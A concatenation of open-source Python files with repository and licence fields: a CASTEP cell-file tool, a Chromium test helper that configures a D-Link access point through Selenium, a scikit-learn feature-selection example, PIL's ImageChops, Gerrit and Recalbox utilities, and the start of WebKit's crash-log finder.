98 : "Cf", 99 : "Es", 100 : "Fm", 101 : "Md", 102 : "No", 103 : "Lr", \
104 : "Rf", 105 : "Db", 106 : "Sg", 107 : "Bh", 108 : "Hs", 109 : "Ds", \
110 : "Ds", 111 : "Rg", 112 : "Uub", 113 : "Uut", 114 : "Uuq", 115 : "Uup", \
116 : "Uuh", 117 : "Uus", 118 : "Uuo", 0 : "UKN"}
def getElementZ(elstr):
""" Z = getElementZ(elstr)
Given a string that contains either a Z number OR an element
abbreviation like Cu, MG, whatever, generates and returns the
appropriate integer Z.
"""
# Is it an integer?
try:
Z = int(elstr)
return Z
except ValueError:
# Not an integer.
if elstr.title() not in elements.values():
print "(libesc.getElementZ) Warning: Element %s is not in the elements dictionary. Returning 0 for element Z." % elstr
return 0
else:
for key, value in elements.items():
if elstr.title() == value:
return key
def remove_comments(lines, comment_delim="#",just_blanks=False):
""" stripped = remove_comments(lines, comment_delim="#", just_blanks=False)
Takes a sequence of lines (presumably from a data file)
and strips all comments, including ones at the end of
lines that are otherwise not comments. Note that we can
only deal with one kind of comment at a time - just apply
multiple times to strip multiple comment types.
Note that we also remove *blank* lines in here, just in
case we're going to do line-by-line processing subsequently
rather than join/splitting (eg. like for XSF files).
If just_blanks is specified, we only eliminate the blanks.
"""
stripped = []
for line in lines:
if just_blanks:
if line.strip() != "":
stripped.append(line.strip())
else:
if not (line.strip().startswith(comment_delim) or line.strip() == ""):
stripped.append(line.partition(comment_delim)[0].strip())
return stripped
def uniqify(sequence, trans=None):
""" unique = uniqify(sequence, trans)
Produces an order-preserved list of unique elements in the passed
sequence. Supports a transform function so that passed elements
can be transformed before comparison if necessary.
"""
if trans is None:
def trans(x): return x
seen = {}
unique = []
for item in sequence:
marker = trans(item)
if marker in seen: continue
seen[marker] = 1
unique.append(item)
return unique
def identify_block(line):
""" blockstr = identify_block(line)
Identifies the actual block title of a castep block like "%block positions_frac".
Can happily cope with comments after the block and all the usual perturbations
such as POSITIONS_FRAC, positionsFrac, positions frac, etc.
"""
# Our working string is wstr. First remove any comments
wstr = line.split("!")[0]
# Remove the actual block
wstr = wstr.split()[1:]
# Combine everything that remains, then split by _ and rejoin.
wstr = "".join(wstr)
wstr = wstr.split("_")
wstr = "".join(wstr)
# Convert to lowercase and return
return wstr.lower()
def parse_cell(lines):
""" positions, species, properties = parse_cell(lines)
Reads a .cell file and returns the positions, the species and a properties
dictionary that contains whether positions_frac or positions_abs was used,
the extra functional lines from the file and anything else useful.
Note we remove all comments.
"""
# Strip all the blank lines and comments.
lines = remove_comments(lines, "!")
# We don't use the for loop here because we may want to sub-loop over blocks.
i = 0
species = []
positions = []
extralines = []
properties = {}
while i < len(lines):
cline = lines[i]
if cline.split()[0].lower() == "%block":
btitle = identify_block(cline)
if DEBUG:
print "Found a block", btitle
if btitle == "positionsfrac" or btitle == "positionsabs":
if btitle == "positionsfrac":
properties["fractional"] = True
else:
properties["fractional"] = False
i += 1
cline = lines[i]
# Might be a units line
if len(cline.split()) == 1:
properties["has units"] = True
properties["units"] = cline.split()[0].strip()
i += 1
cline = lines[i]
else:
properties["has units"] = False
while cline.split()[0].lower() != "%endblock":
species.append(getElementZ(cline.split()[0]))
positions.append([float(x) for x in cline.split()[1:4]])
i += 1
cline = lines[i]
else:
# We aren't interested in the other blocks: just add them to the extra lines.
extralines.append(cline)
else:
# If we aren't reading a block and it isn't a line we're interested in, add
# to the extra lines.
extralines.append(cline)
i += 1
properties["extra lines"] = extralines
return positions, species, properties
def write_new_cell(seed, pos, spec, props, special_index):
""" write_new_cell(seed, pos, spec, props, special_index)
Writes the new .cell file to seed+"_special.cell" and with the special atom listed
as "Z:exc" or whatever the custom SPECIAL text is set at the top of the file.
"""
f = open(seed+"_special.cell", 'w')
# Write all the extra lines first
for line in props["extra lines"]:
f.write(line+"\n")
if "%endblock" in line.lower():
f.write("\n")
# Now write the positions block.
f.write("\n")
if props["fractional"] == True:
f.write("%block positions_frac\n")
else:
f.write("%block positions_abs\n")
if props["has units"]:
f.write(props["units"]+"\n")
for i in range(len(pos)):
if i == special_index:
pstr = "%s%s %g %g %g\n" % (elements[spec[i]], SPECIAL, pos[i][0], pos[i][1], pos[i][2])
else:
pstr = "%s %g %g %g\n" % (elements[spec[i]], pos[i][0], pos[i][1], pos[i][2])
f.write(pstr)
if props["fractional"] == True:
f.write("%endblock positions_frac\n")
else:
f.write("%endblock positions_abs\n")
f.close()
def index_of_species_index(species, Z, n):
""" i = index_of_species_index(Z, n)
Returns the absolute index in the species list of the nth species of element Z.
"""
si = -1
for i, s in enumerate(species):
if DEBUG:
print "Testing atom %d, element %d to see if it matches %d." % (i, s, n)
if s == Z:
si += 1
if si == n:
return i
# Didn't find it
return -1
# Main program
if __name__ == '__main__':
print "castep_special_atom version 2.0"
print ""
print "Written by Kane O'Donnell, September 2013"
print ""
# Parse the command line arguments
parser = argparse.ArgumentParser(description="Make a named atom special in a .cell file")
parser.add_argument('SEED', help="Input file is SEED.cell")
parser.add_argument('Z', help="Element (e.g. C or 6) to make special.")
parser.add_argument('n', type=int, help="Make the nth atom of element Z special. 1-based.")
args = parser.parse_args()
# Convert from 1-based n and possibly-string Z to 0-based n and integer Z.
n = args.n - 1
z = getElementZ(args.Z)
# Sanity check on inputs
if n < 0:
print "ERROR: It looks like you've specified a negative number for the atomic index. Try again. Exiting..."
exit(0)
if z == 0:
print "ERROR: You've specified an unknown element - it has to be one of the ones in our universe, not imaginary ones! Try again. Exiting..."
exit(0)
# Read the cell and check for any species "0" - i.e. if we already have special atoms.
f = open(args.SEED+".cell", 'r')
lines = f.readlines()
f.close()
p, s, props = parse_cell(lines)
if 0 in s:
print "ERROR: There are unknown species in this file already - you already have at least one special atom. For safety reasons, cannot continue. Goodbye!"
exit(0)
si = index_of_species_index(s, z, n)
if si == -1:
print "ERROR: Didn't find atom %d of species %s. Exiting..." % (n, args.Z)
exit(0)
write_new_cell(args.SEED, p, s, props, si)
print "Goodbye!"
exit(0) | gpl-3.0 |
ThirdProject/android_external_chromium_org | chrome/test/functional/ap_lab/dlink_ap_configurator.py | 76 | 12111 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import ap_configurator
import selenium.common.exceptions
class DLinkAPConfigurator(ap_configurator.APConfigurator):
"""Derived class to control the DLink DAP-1522."""
def __init__(self, pyauto_instance, admin_interface_url):
super(DLinkAPConfigurator, self).__init__(pyauto_instance)
# Override constants
self.security_disabled = 'Disable Wireless Security (not recommended)'
self.security_wep = 'WEP'
self.security_wpapsk = 'WPA-Personal'
self.security_wpa2psk = 'WPA-Personal'
self.security_wpa8021x = 'WPA-Enterprise'
self.security_wpa28021x = 'WPA2-Enterprise'
self.admin_interface_url = admin_interface_url
def _OpenLandingPage(self):
self.pyauto_instance.NavigateToURL('http://%s/index.php' %
self.admin_interface_url)
page_name = os.path.basename(self.pyauto_instance.GetActiveTabURL().spec())
if page_name == 'login.php' or page_name == 'index.php':
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'//*[@name="login"]'))
except selenium.common.exceptions.TimeoutException, e:
# Maybe we were re-routes to the configuration page
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) ==
'bsc_wizard.php'):
return
logging.exception('WebDriver exception: %s', str(e))
login_button = self._driver.find_element_by_xpath('//*[@name="login"]')
login_button.click()
def _OpenConfigurationPage(self):
self._OpenLandingPage()
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) !=
'bsc_wizard.php'):
self.fail(msg='Taken to an unknown page %s' %
self.pyauto_instance.GetActiveTabURL().spec())
# Else we are being logged in automatically to the landing page
wlan = '//*[@name="wlan_wireless"]'
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(wlan))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
wlan_button = self._driver.find_element_by_xpath(wlan)
wlan_button.click()
# Wait for the main configuration page, look for the radio button
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
def GetRouterName(self):
return 'Router Name: DAP-1522; Class: DLinkAPConfigurator'
def GetRouterShortName(self):
return 'DAP-1522'
def GetNumberOfPages(self):
return 1
def GetSupportedBands(self):
return [{'band': self.band_2ghz,
'channels': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]},
{'band': self.band_5ghz,
'channels': [26, 40, 44, 48, 149, 153, 157, 161, 165]}]
def GetSupportedModes(self):
return [{'band': self.band_2ghz,
'modes': [self.mode_b, self.mode_g, self.mode_n,
self.mode_b | self.mode_g, self.mode_g | self.mode_n]},
{'band': self.band_5ghz,
'modes': [self.mode_a, self.mode_n, self.mode_a | self.mode_n]}]
def NavigateToPage(self, page_number):
# All settings are on the same page, so we always open the config page
self._OpenConfigurationPage()
return True
def SavePage(self, page_number):
# All settings are on the same page, we can ignore page_number
button = self._driver.find_element_by_xpath('//input[@name="apply"]')
button.click()
# If we did not make changes so we are sent to the continue screen.
continue_screen = True
button_xpath = '//input[@name="bt"]'
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(button_xpath))
except selenium.common.exceptions.TimeoutException, e:
continue_screen = False
if continue_screen:
button = self._driver.find_element_by_xpath(button_xpath)
button.click()
# We will be returned to the landing page when complete
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath('id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
return False
return True
def SetMode(self, mode, band=None):
# Mode overrides the band. So if a band change is made after a mode change
# it may make an incompatible pairing.
self.AddItemToCommandList(self._SetMode, (mode, band), 1, 800)
def _SetMode(self, mode, band=None):
# Create the mode to popup item mapping
mode_mapping = {self.mode_b: '802.11b Only', self.mode_g: '802.11g Only',
self.mode_n: '802.11n Only',
self.mode_b | self.mode_g: 'Mixed 802.11g and 802.11b',
self.mode_n | self.mode_g: 'Mixed 802.11n and 802.11g',
self.mode_n | self.mode_g | self.mode_b:
'Mixed 802.11n, 802.11g, and 802.11b',
self.mode_n | self.mode_g | self.mode_b:
'Mixed 802.11n, 802.11g, and 802.11b',
self.mode_a: '802.11a Only',
self.mode_n | self.mode_a: 'Mixed 802.11n and 802.11a'}
band_value = self.band_2ghz
if mode in mode_mapping.keys():
popup_value = mode_mapping[mode]
# If the mode contains 802.11a we use 5Ghz
if mode & self.mode_a == self.mode_a:
band_value = self.band_5ghz
# If the mode is 802.11n mixed with 802.11a it must be 5Ghz
elif mode & (self.mode_n | self.mode_a) == (self.mode_n | self.mode_a):
band_value = self.band_5ghz
# If the mode is 802.11n mixed with something other than 802.11a its 2Ghz
elif mode & self.mode_n == self.mode_n and mode ^ self.mode_n > 0:
band_value = self.band_2ghz
# If the mode is 802.11n then we default to 5Ghz unless there is a band
elif mode == self.mode_n:
band_value = self.band_5ghz
if band:
band_value = band
else:
logging.exception('The mode selected %d is not supported by router %s.',
hex(mode), self.getRouterName())
# Set the band first
self._SetBand(band_value)
popup_id = 'mode_80211_11g'
if band_value == self.band_5ghz:
popup_id = 'mode_80211_11a'
self.SelectItemFromPopupByID(popup_value, popup_id)
def SetRadio(self, enabled=True):
# If we are enabling we are activating all other UI components, do it first.
# Otherwise we are turning everything off so do it last.
if enabled:
weight = 1
else:
weight = 1000
# This disables all UI so it should be the last item to be changed
self.AddItemToCommandList(self._SetRadio, (enabled,), 1, weight)
def _SetRadio(self, enabled=True):
# The radio checkbox for this router always has a value of 1. So we need to
# use other methods to determine if the radio is on or not. Check if the
# ssid textfield is disabled.
ssid = self._driver.find_element_by_xpath('//input[@name="ssid"]')
if ssid.get_attribute('disabled') == 'true':
radio_enabled = False
else:
radio_enabled = True
if radio_enabled == enabled:
# Nothing to do
return
self.SetCheckBoxSelectedByID('enable', selected=False,
wait_for_xpath='id("security_type_ap")')
def SetSSID(self, ssid):
# Can be done as long as it is enabled
self.AddItemToCommandList(self._SetSSID, (ssid,), 1, 900)
def _SetSSID(self, ssid):
self._SetRadio(enabled=True)
self.SetContentOfTextFieldByID(ssid, 'ssid')
def SetChannel(self, channel):
self.AddItemToCommandList(self._SetChannel, (channel,), 1, 900)
def _SetChannel(self, channel):
self._SetRadio(enabled=True)
self.SetCheckBoxSelectedByID('autochann', selected=False)
self.SelectItemFromPopupByID(str(channel), 'channel_g')
# Experimental
def GetBand(self):
# The radio buttons do more than run a script that adjusts the possible
# channels. We will just check the channel to popup.
self.setRadioSetting(enabled=True)
xpath = ('id("channel_g")')
self._OpenConfigurationPage()
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
element = self._driver.find_element_by_xpath(xpath)
if element.find_elements_by_tag_name('option')[0].text == '1':
return self.band_2ghz
return self.band_5ghz
def SetBand(self, band):
if band != self.band_2GHz or band != self.band_5ghz:
self.fail(msg='Invalid band sent %s' % band)
self.AddItemToCommandList(self._SetBand, (band,), 1, 900)
def _SetBand(self, band):
self._SetRadio(enabled=True)
if band == self.band_2ghz:
int_value = 0
wait_for_xpath = 'id("mode_80211_11g")'
elif band == self.band_5ghz:
int_value = 1
wait_for_xpath = 'id("mode_80211_11a")'
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" and @name="band"]'
% int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(wait_for_xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('The appropriate mode popup could not be found after '
'adjusting the band. WebDriver exception: %s', str(e))
def SetSecurityDisabled(self):
self.AddItemToCommandList(self._SetSecurityDisabled, (), 1, 900)
def _SetSecurityDisabled(self):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_disabled, 'security_type_ap')
def SetSecurityWEP(self, key_value, authentication):
self.AddItemToCommandList(self._SetSecurityWEP, (key_value, authentication),
1, 900)
def _SetSecurityWEP(self, key_value, authentication):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wep, 'security_type_ap',
wait_for_xpath='id("auth_type")')
self.SelectItemFromPopupByID(authentication, 'auth_type',
wait_for_xpath='id("wep_key_value")')
self.SetContentOfTextFieldByID(key_value, 'wep_key_value')
self.SetContentOfTextFieldByID(key_value, 'verify_wep_key_value')
def SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self.AddItemToCommandList(self._SetSecurityWPAPSK,
(shared_key, update_interval), 1, 900)
def _SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wpapsk, 'security_type_ap',
wait_for_xpath='id("wpa_mode")')
self.SelectItemFromPopupByID('WPA Only', 'wpa_mode',
wait_for_xpath='id("grp_key_interval")')
self.SetContentOfTextFieldByID(str(update_interval), 'grp_key_interval')
self.SetContentOfTextFieldByID(shared_key, 'wpapsk1')
def SetVisibility(self, visible=True):
self.AddItemToCommandList(self._SetVisibility, (visible,), 1, 900)
def _SetVisibility(self, visible=True):
self._SetRadio(enabled=True)
# value=0 is visible; value=1 is invisible
int_value = 0
if not visible:
int_value = 1
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" '
'and @name="visibility_status"]' % int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
| bsd-3-clause |
RachitKansal/scikit-learn | examples/feature_selection/plot_rfe_with_cross_validation.py | 226 | 1384 | """
===================================================
Recursive feature elimination with cross-validation
===================================================
A recursive feature elimination example with automatic tuning of the
number of features selected with cross-validation.
"""
print(__doc__)
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold
from sklearn.feature_selection import RFECV
from sklearn.datasets import make_classification
# Build a classification task using 3 informative features
X, y = make_classification(n_samples=1000, n_features=25, n_informative=3,
n_redundant=2, n_repeated=0, n_classes=8,
n_clusters_per_class=1, random_state=0)
# Create the RFE object and compute a cross-validated score.
svc = SVC(kernel="linear")
# The "accuracy" scoring is proportional to the number of correct
# classifications
rfecv = RFECV(estimator=svc, step=1, cv=StratifiedKFold(y, 2),
scoring='accuracy')
rfecv.fit(X, y)
print("Optimal number of features : %d" % rfecv.n_features_)
# Plot number of features VS. cross-validation scores
plt.figure()
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score (nb of correct classifications)")
plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
plt.show()
| bsd-3-clause |
ambujone/breath-hackathon | gae/lib/PIL/ImageChops.py | 40 | 7411 | #
# The Python Imaging Library.
# $Id$
#
# standard channel operations
#
# History:
# 1996-03-24 fl Created
# 1996-08-13 fl Added logical operations (for "1" images)
# 2000-10-12 fl Added offset method (from Image.py)
#
# Copyright (c) 1997-2000 by Secret Labs AB
# Copyright (c) 1996-2000 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import Image
##
# The <b>ImageChops</b> module contains a number of arithmetical image
# operations, called <i>channel operations</i> ("chops"). These can be
# used for various purposes, including special effects, image
# compositions, algorithmic painting, and more.
# <p>
# At this time, channel operations are only implemented for 8-bit
# images (e.g. "L" and "RGB").
# <p>
# Most channel operations take one or two image arguments and returns
# a new image. Unless otherwise noted, the result of a channel
# operation is always clipped to the range 0 to MAX (which is 255 for
# all modes supported by the operations in this module).
##
##
# Return an image with the same size as the given image, but filled
# with the given pixel value.
#
# @param image Reference image.
# @param value Pixel value.
# @return An image object.
def constant(image, value):
"Fill a channel with a given grey level"
return Image.new("L", image.size, value)
##
# Copy image.
#
# @param image Source image.
# @return A copy of the source image.
def duplicate(image):
"Create a copy of a channel"
return image.copy()
##
# Inverts an image
# (MAX - image).
#
# @param image Source image.
# @return An image object.
def invert(image):
"Invert a channel"
image.load()
return image._new(image.im.chop_invert())
##
# Compare images, and return lighter pixel value
# (max(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the lighter values.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def lighter(image1, image2):
"Select the lighter pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_lighter(image2.im))
##
# Compare images, and return darker pixel value
# (min(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the darker values.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def darker(image1, image2):
"Select the darker pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_darker(image2.im))
##
# Calculate absolute difference
# (abs(image1 - image2)).
# <p>
# Returns the absolute value of the difference between the two images.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def difference(image1, image2):
"Subtract one image from another"
image1.load()
image2.load()
return image1._new(image1.im.chop_difference(image2.im))
##
# Superimpose positive images
# (image1 * image2 / MAX).
# <p>
# Superimposes two images on top of each other. If you multiply an
# image with a solid black image, the result is black. If you multiply
# with a solid white image, the image is unaffected.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def multiply(image1, image2):
"Superimpose two positive images"
image1.load()
image2.load()
return image1._new(image1.im.chop_multiply(image2.im))
##
# Superimpose negative images
# (MAX - ((MAX - image1) * (MAX - image2) / MAX)).
# <p>
# Superimposes two inverted images on top of each other.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def screen(image1, image2):
"Superimpose two negative images"
image1.load()
image2.load()
return image1._new(image1.im.chop_screen(image2.im))
##
# Add images
# ((image1 + image2) / scale + offset).
# <p>
# Adds two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def add(image1, image2, scale=1.0, offset=0):
"Add two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_add(image2.im, scale, offset))
##
# Subtract images
# ((image1 - image2) / scale + offset).
# <p>
# Subtracts two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def subtract(image1, image2, scale=1.0, offset=0):
"Subtract two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract(image2.im, scale, offset))
##
# Add images without clipping
# ((image1 + image2) % MAX).
# <p>
# Adds two images, without clipping the result.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def add_modulo(image1, image2):
"Add two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_add_modulo(image2.im))
##
# Subtract images without clipping
# ((image1 - image2) % MAX).
# <p>
# Subtracts two images, without clipping the result.
#
# @param image1 First image.
# @param image1 Second image.
# @return An image object.
def subtract_modulo(image1, image2):
"Subtract two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract_modulo(image2.im))
##
# Logical AND
# (image1 and image2).
def logical_and(image1, image2):
"Logical and between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_and(image2.im))
##
# Logical OR
# (image1 or image2).
def logical_or(image1, image2):
"Logical or between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_or(image2.im))
##
# Logical XOR
# (image1 xor image2).
def logical_xor(image1, image2):
"Logical xor between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_xor(image2.im))
##
# Blend images using constant transparency weight.
# <p>
# Same as the <b>blend</b> function in the <b>Image</b> module.
def blend(image1, image2, alpha):
"Blend two images using a constant transparency weight"
return Image.blend(image1, image2, alpha)
##
# Create composite using transparency mask.
# <p>
# Same as the <b>composite</b> function in the <b>Image</b> module.
def composite(image1, image2, mask):
"Create composite image by blending images using a transparency mask"
return Image.composite(image1, image2, mask)
##
# Offset image data.
# <p>
# Returns a copy of the image where data has been offset by the given
# distances. Data wraps around the edges. If yoffset is omitted, it
# is assumed to be equal to xoffset.
#
# @param image Source image.
# @param xoffset The horizontal distance.
# @param yoffset The vertical distance. If omitted, both
# distances are set to the same value.
# @return An Image object.
def offset(image, xoffset, yoffset=None):
"Offset image in horizontal and/or vertical direction"
if yoffset is None:
yoffset = xoffset
image.load()
return image._new(image.im.offset(xoffset, yoffset))
| mit |
rcbau/hacks | gerrit/utility.py | 1 | 1291 | #!/usr/bin/python
import decimal
import types
import unicodedata
import urllib
def DisplayFriendlySize(bytes):
"""DisplayFriendlySize -- turn a number of bytes into a nice string"""
t = type(bytes)
if t != types.LongType and t != types.IntType and t != decimal.Decimal:
return 'NotANumber(%s=%s)' %(t, bytes)
if bytes < 1024:
return '%d bytes' % bytes
if bytes < 1024 * 1024:
return '%d kb (%d bytes)' %((bytes / 1024), bytes)
if bytes < 1024 * 1024 * 1024:
return '%d mb (%d bytes)' %((bytes / (1024 * 1024)), bytes)
return '%d gb (%d bytes)' %((bytes / (1024 * 1024 * 1024)), bytes)
def Normalize(value):
normalized = unicodedata.normalize('NFKD', unicode(value))
normalized = normalized.encode('ascii', 'ignore')
return normalized
def read_remote_lines(url):
remote = urllib.urlopen(url)
data = ''
while True:
d = remote.read(100)
if not d:
break
data += d
if data.find('\n') != -1:
elems = data.split('\n')
for line in elems[:-1]:
yield line
data = elems[-1]
if data:
yield data
def read_remote_file(url):
data = []
for line in read_remote_lines(url):
data.append(line)
return '\n'.join(data)
| apache-2.0 |
digitalLumberjack/recalbox-configgen | runtest/case.py | 2 | 2950 | '''
Created on Mar 6, 2016
@author: Laurent Marchelli
'''
import os
import sys
import shutil
import unittest
from . import dir_res, dir_tmp
class TestCase(unittest.TestCase):
args_dict = {}
@classmethod
def setUpClass(cls, system, emulator):
# Define test system configuration path
cls.path_init = os.path.join(dir_res, emulator)
cls.path_user = os.path.join(dir_tmp, emulator)
# Define test needed objects
lst_args = [
"p1index", "p1guid", "p1name", "p1devicepath",
"p2index", "p2guid", "p2name", "p2devicepath",
"p3index", "p3guid", "p3name", "p3devicepath",
"p4index", "p4guid", "p4name", "p4devicepath",
"p5index", "p5guid", "p5name", "p5devicepath",
"system", "rom", "emulator", "core", "demo",
]
lst_values = [None] * len(lst_args)
cls.args_dict = dict(zip(lst_args, lst_values))
cls.args_dict['system'] = system
cls.args_dict['emulator'] = emulator
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
# Cleanup previous test temporary files
if os.path.exists(self.path_user):
shutil.rmtree(self.path_user)
# Create test environment
os.makedirs(self.path_user)
# Copy class args into instance args to avoid corruption by
# test instances.
self.args = self.__class__.args_dict.copy()
def tearDown(self):
pass
def __init__(self, methodName='runTest', params=None, results=None, msg=None):
super(TestCase, self).__init__(methodName)
self.params = params
self.results = results
self.message = msg
def __str__(self):
msg = '' if self.message is None else '({})'.format(self.message)
return "{}.{}{}".format(self.__class__.__name__,
self._testMethodName, msg)
def assertDictContentEqual(self, d1, d2, msg=None):
self.assertListEqual(sorted(d1.items()),
sorted(d2.items()))
# Thanks to Rob Cowie (http://stackoverflow.com/users/46690/rob-cowie)
# From : http://stackoverflow.com/posts/6796752/revisions
class RedirectStdStreams(object):
def __init__(self, stdout=None, stderr=None):
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stdout, self.old_stderr = sys.stdout, sys.stderr
self.old_stdout.flush(); self.old_stderr.flush()
sys.stdout, sys.stderr = self._stdout, self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush(); self._stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | mit |
lombritz/odoo | addons/product_margin/__init__.py | 444 | 1092 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import product_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
gitromand/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/system/crashlogs.py | 117 | 5490 | # Copyright (c) 2011, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import codecs
import re
class CrashLogs(object):
PID_LINE_REGEX = re.compile(r'\s+Global\s+PID:\s+\[(?P<pid>\d+)\]')
def __init__(self, host, results_directory=None):
self._host = host
self._results_directory = results_directory
def find_newest_log(self, process_name, pid=None, include_errors=False, newer_than=None):
if self._host.platform.is_mac():
return self._find_newest_log_darwin(process_name, pid, include_errors, newer_than)
elif self._host.platform.is_win():
return self._find_newest_log_win(process_name, pid, include_errors, newer_than)
return None
def _log_directory_darwin(self):
log_directory = self._host.filesystem.expanduser("~")
log_directory = self._host.filesystem.join(log_directory, "Library", "Logs")
if self._host.filesystem.exists(self._host.filesystem.join(log_directory, "DiagnosticReports")):
log_directory = self._host.filesystem.join(log_directory, "DiagnosticReports")
else:
log_directory = self._host.filesystem.join(log_directory, "CrashReporter")
return log_directory
def _find_newest_log_darwin(self, process_name, pid, include_errors, newer_than):
def is_crash_log(fs, dirpath, basename):
return basename.startswith(process_name + "_") and basename.endswith(".crash")
log_directory = self._log_directory_darwin()
logs = self._host.filesystem.files_under(log_directory, file_filter=is_crash_log)
first_line_regex = re.compile(r'^Process:\s+(?P<process_name>.*) \[(?P<pid>\d+)\]$')
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
f = self._host.filesystem.read_text_file(path)
match = first_line_regex.match(f[0:f.find('\n')])
if match and match.group('process_name') == process_name and (pid is None or int(match.group('pid')) == pid):
return errors + f
except IOError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
def _find_newest_log_win(self, process_name, pid, include_errors, newer_than):
